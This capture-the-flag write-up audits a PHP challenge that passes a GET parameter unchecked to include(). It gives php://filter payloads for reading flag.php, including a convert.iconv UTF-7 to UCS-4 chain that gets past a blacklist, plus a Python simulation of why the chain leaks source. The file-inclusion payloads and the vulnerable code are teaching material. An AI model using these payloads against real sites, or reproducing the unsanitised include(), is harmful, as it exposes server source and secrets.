1. Code audit
<?php
highlight_file(__FILE__);        // prints this file's own source
include("./check.php");          // a check on the request runs first; its source is not shown here
if(isset($_GET['filename'])){
$filename = $_GET['filename'];   // attacker-controlled
include($filename);              // inclusion with no allowlist: any path or stream wrapper ends up here
}
?>
2. A new trick for file inclusion
Besides making include() execute PHP code, the inclusion can be used to read files through PHP's stream wrappers (pseudo-protocols); the flag sits at the default location /var/www/html/flag.php.
First try the usual
/?filename=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
to read the flag. The response is "do not hack": check.php, which is included before our parameter is used, rejects something in this payload (its source is not shown, so which token trips it is not visible here).
Next, consider the other filters and the character sets they accept. Common conversion filters are
- convert.base64-encode / convert.base64-decode
- convert.quoted-printable-encode / convert.quoted-printable-decode
- convert.iconv.<from-charset>.<to-charset> (PHP also accepts convert.iconv.<from>/<to>)
- the string filters: string.rot13, string.toupper, string.tolower
Character sets PHP commonly accepts include
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
(The full list of supported encodings is in the PHP manual: https://www.php.net/manual/zh/mbstring.supported-encodings.php. Note that convert.iconv hands the two names to the iconv library PHP was built against, glibc or GNU libiconv, so that library's alias table, as shown by iconv -l, decides which names are accepted, not mbstring.)
This gives the payload:
?filename=php://filter/convert.iconv.UTF-7.UCS-4/resource=/var/www/html/flag.php
The convert.iconv stage re-encodes flag.php as UCS-4 (four bytes per character, three of them NUL for ASCII), so the bytes that reach include() no longer contain a literal <?php tag and are copied to the output instead of being executed. The response then has to be converted back (for example with iconv -f UCS-4 -t UTF-8, or simply by dropping the NUL bytes) to read the flag.
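To see why the iconv chain leaks source that include() would otherwise execute, here is an added Python simulation of what the php://filter stages do to the bytes of the included file. It is not the challenge's PHP and not PHP's own filter code: a constructed stand-in for flag.php is pushed through a filter chain, the result is checked for a literal open tag, and the server's response is decoded back to source. The iconv charset names are mapped onto Python codecs, which matches glibc iconv for the ASCII content of a PHP file; the flag path is the one from the write-up, the file contents are made up.

```python
import base64
import codecs
import re

# Constructed stand-in for /var/www/html/flag.php; the real file is not shown in the write-up.
FLAG_PHP = b"<?php\n$flag = 'flag{constructed_example}';\n?>\n"

# Charset names as they appear in convert.iconv.<from>.<to>, mapped to Python codecs.
# For the ASCII/BMP content of a PHP file UCS-4 == UTF-32 and UCS-2 == UTF-16;
# glibc treats the unsuffixed UCS-2 / UCS-4 names as big-endian.
_CODECS = {
    "ASCII": "ascii", "UTF-8": "utf_8", "UTF-7": "utf_7",
    "UCS-2": "utf_16_be", "UCS-2BE": "utf_16_be", "UCS-2LE": "utf_16_le",
    "UCS-4": "utf_32_be", "UCS-4BE": "utf_32_be", "UCS-4LE": "utf_32_le",
    "UTF-16BE": "utf_16_be", "UTF-16LE": "utf_16_le",
    "UTF-32BE": "utf_32_be", "UTF-32LE": "utf_32_le",
}


def filter_url(chain, resource):
    """Build the php://filter URL: filter stages separated by '/', then /resource=<path>."""
    return "php://filter/" + "/".join(chain) + "/resource=" + resource


def iconv_charsets(name):
    """Split convert.iconv.<from>.<to> (PHP also accepts <from>/<to>) into its two charsets."""
    spec = name[len("convert.iconv."):]
    return re.split(r"[./]", spec, maxsplit=1)


def apply_filter(data, name):
    """Simulate one php://filter stage on the bytes flowing through the stream."""
    if name == "convert.base64-encode":
        return base64.b64encode(data)
    if name == "convert.base64-decode":
        return base64.b64decode(data)
    if name == "string.rot13":
        return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
    if name.startswith("convert.iconv."):
        src, dst = iconv_charsets(name)
        # The source charset must be able to decode the file: UTF-7 treats a literal '+'
        # as the start of a shift sequence, so ASCII or UTF-8 is the safer choice there.
        return data.decode(_CODECS[src]).encode(_CODECS[dst])
    raise ValueError("filter not modelled: " + name)


def apply_chain(data, chain):
    for name in chain:
        data = apply_filter(data, name)
    return data


def has_open_tag(data):
    """include() only executes what it recognises as PHP, i.e. a literal open tag in the
    bytes. Anything else is copied to the output, which is how the source leaks."""
    return b"<?php" in data or b"<?=" in data


def inverse(name):
    """Inverse stage, used to recover the source from the server's response."""
    if name == "convert.base64-encode":
        return "convert.base64-decode"
    if name == "string.rot13":
        return name
    if name.startswith("convert.iconv."):
        src, dst = iconv_charsets(name)
        return "convert.iconv." + dst + "." + src
    raise ValueError("no inverse modelled: " + name)


def recover_source(response, chain):
    """Undo the chain the server applied, last stage first."""
    return apply_chain(response, [inverse(n) for n in reversed(chain)])


if __name__ == "__main__":
    chain = ["convert.iconv.UTF-7.UCS-4"]
    print(filter_url(chain, "/var/www/html/flag.php"))
    leaked = apply_chain(FLAG_PHP, chain)
    print("executable as PHP:", has_open_tag(leaked))   # the tag is now 00 00 00 3C 00 00 00 3F ...
    print(recover_source(leaked, chain).decode())
```

The same two functions explain the first, blocked attempt: convert.base64-encode also removes the open tag (the base64 alphabet has no '<' or '?'), which is exactly why a blacklist on the filter name rather than on the mechanism is so easy to route around with a different stage.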